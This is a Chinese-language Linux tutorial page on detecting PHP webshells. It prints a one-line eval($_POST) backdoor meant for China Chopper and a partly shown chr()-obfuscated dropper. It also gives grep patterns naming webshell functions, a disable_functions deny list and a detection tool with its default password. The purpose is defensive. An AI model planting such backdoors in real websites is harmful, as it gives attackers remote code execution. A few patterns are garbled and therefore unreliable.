歡迎來到Linux教程網
Linux教程網
Linux教程網
Linux教程網
您现在的位置: Linux教程網 >> UnixLinux >  >> Linux編程 >> SHELL編程

linux查找webshell

linux查找webshell   首先認識一下小馬,一般大馬容易暴露,駭客都會留一手,把小馬加入正常PHP文件裡面   <?php eval ($_POST[a]);?> //密碼為a,使用中國菜刀連接   隱藏很深的小馬   fputs(fopen(chr(46).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112),w),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40). 。。。省略   解碼: 其中chr括號裡面的數字是美國信息交換標准代碼,縮寫:ASCII 可以找一份對照表對應一下   比如 46  就是 .        47  就是 /        32  就是 空格   也可以echo chr(46)解出來 <?php echo chr(46).chr(47).chr(97).chr(46) ?>   WINDOWS下的應該有很多日志分析和查殺工具(很少用WIN表示不能舉例),那麼,LINUX下如何查找WEBSHELL呢?     1 find /www/ -name "*.php" |xargs egrep 'assert|phpspy|c99sh|milw0rm|eval|\(gunerpress|\(base64_decoolcode|spider_bc|shell_exec|passthru|\]\(\$\_\POST\[|eval\(str_rot13'>/opt/www.log & 然後就手工查看,寫入計劃任務啦。 只查小馬的可以     1 grep -r --include=*.php  '[^a-z]eval($_POST' . > post.txt 2 grep -r --include=*.php  '[^a-z]eval($_REQUEST' . > REQUEST.txt 查出來了,重要的是要分析日志,查看入侵源頭。 防范:   禁用危險函數,整理權限,防止權限過大     1 disable_functions = exec,scandir,shell_exec,phpinfo,eval,passthru,system,chroot,chgrp,chown,proc_open,proc_get_status,ini_alter,ini_restore,dl,openlog,syslog,readlink,s 2 ymlink,popepassthru,stream_socket_server,fsocket   git 下來  只需要2個文件 shelldetect.php   //默認帳號密碼 admin protect  shelldetect.db   如果你有什麼好的建議,感謝你的分享:)   PS:shell反彈
Copyright © Linux教程網 All Rights Reserved